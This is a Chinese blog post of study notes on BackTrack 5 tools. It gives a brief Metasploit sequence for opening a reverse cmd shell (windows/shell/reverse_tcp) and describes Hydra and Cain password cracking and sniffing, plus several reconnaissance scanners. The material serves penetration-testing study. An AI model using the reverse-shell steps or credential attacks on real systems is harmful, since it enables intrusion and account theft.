Back Track 5 之 漏洞攻击 && 密码攻击 && Windows下渗透工具

网络漏洞攻击工具

• Metasploit

　　先msfupdate升级：

　　然后选择msfconsole：

　　接下来：

set LHOST 本机IP地址

setLPORT 

setg PAYLOAD windows/shell/reverse_tcp

setg RHOST 目标IP地址

setg port 

set target 随意数字

exploit

这样就可以反弹一个cmd shell了。

密码破解

• Hydra

多samba,smb,ssh,smtp,telnet,mysql,ftp,vnc,icq,socks5,pcnfs,cisco等各类主流服务进行在线密码破解攻击尝试攻击。

字典破解，Protocol中有很多，主要是之前扫描出来的端口开放情况来进行的。

Windows下渗透工具介绍

• maltegoCE

　　DNS收集。

• IBM Rational AppScan

　　自动化web应用的安全漏洞评估工作，能扫描和检测所以常见的web应用安全漏洞，例如SQL注入、跨站点脚本攻击、缓冲区溢出以及最新的FLASH/FLEX应用和Web2.0应用暴露等方面安全漏洞扫描。

• SmartWhois

　　查找所以关于IP地址、主机名或者域名的可用信息，包括国家、州或省、沉城市、网络供应方、网络管理员和技术支持信息。

• Sam Spade

　　如果一个黑客想查询一个有域名的公司的某些信息，通常可以对该域名执行whois命令来找到附加信息。UNIX的大多数版本都装有whois，所以黑客只需要在终端窗口或者命令提示前输入“whois 要攻击的域名”就可以了。而对于windows的操作系统，要执行whois命令就需要一个第三方的工具：sam spade。

• Cain

　　可以破解屏保、PWL密码、共享密码、缓存口令、远程共享口令、SMB口令、支持VNC口令解码、Cisco Type-7口令解码、Base64口令解码、SQL Server 7.0/2000口令解码、Remote Desktop口令解码、Access Database口令解码、Cisco PIX Firewall口令解码、Cisco MD5解码、NTLM Session Security口令解码、IKE Aggressive Mode Pre-Shared Keys口令解码等综合工具，还可以远程破解，可以挂字典以及暴力破解，其sniffer功能极其强大，几乎可以明文捕获一切帐号口令，包括FTP、HTTP、IMAP、POP3、SMB、TELNET、VNC、TDS、SMTP、MSKERB5-PREAUTH、MSN、RADIUS-KEYS、RADIUS-USERS、ICQ、IKE Aggressive Mode Pre-Shared Keys authentications等

• FOCA Free

　　可以找出更多有关分析网站提供的任何文件的元数据。

• Nessus

　　前面讲到过。= =

• Nmap – Zenmap GUI

　　一个网络扫描程序,你还可以用它来看别人电脑在下载什么。

• Metasploit

　　Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，密码审计，Web应用程序扫描，社会工程。团队合作，在Metasploit和综合报告提出了他们的发现。

• Firefox Portable

　　火狐的插件。

• 获取的知识

　　再次感谢《back track 5 从入门到精通 ——渗透之道》这本书。

　　这本书算是边学习边操作边记录边分享的完成了，但是BT5里面还有很多工具，以后我会主要分享里面很实用很实用的工具。

　　希望学习完这本书能够BT5基本入个门，在打开每个工具的时候，都会有帮助，太棒了~~~其实可以直接看帮助的，但是全是英文，虽然我个人觉得我的英文还不错。

转载请注明出处：http://www.cnblogs.com/yydcdut/p/3491302.html